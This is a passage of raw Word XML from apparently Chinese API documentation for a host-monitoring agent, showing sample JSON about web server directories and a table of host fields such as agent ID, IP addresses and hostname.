        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "root": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/error/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>physicalPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/var/www/error/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "permission": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ownerType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "root": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "root": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "path": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>physicalPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/var/www/html",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "permission": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ownerType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "root": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virtualDirCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3013,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "httpd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/httpd ",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>configName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "state": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bindingCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deployPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/root/apache-tomcat-8.0.38/webapps"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A70809"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736"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="2918"/>
        <w:gridCol w:w="4418"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C8934C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0EC2AC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3197D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C99F502" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29592911" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5DA4985D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B9F08A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="764D8D7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1839C676" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B7F4C71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="174C078C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E7617CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637C0284" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27796323" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76DCFFBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="355963E4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ACA5282" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ECC3E76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C850AAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F6CE69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4295C368" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415A0230" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3512B58B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29CB61A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A6CFF94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65090246" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06764354" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02019921" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="125C2F87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75980BC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2CFEFE69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25A912C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6241D326" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="124E52DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61CDBE00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4FCFB4E0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D72D803" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49D5CB13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29DC6588" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072FCCC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="522409AD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E5AD342" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D677BAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76003026" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00442AA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2580F8F3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B940B9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098E5F21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35E42757" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC610D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12BBF632" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FDB4AE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AD49A50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4930E393" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7397699F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4595B8BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE09256" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755AD397" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38744CB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60AF712D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="75175905" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BDD325C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>allow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FE1A507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
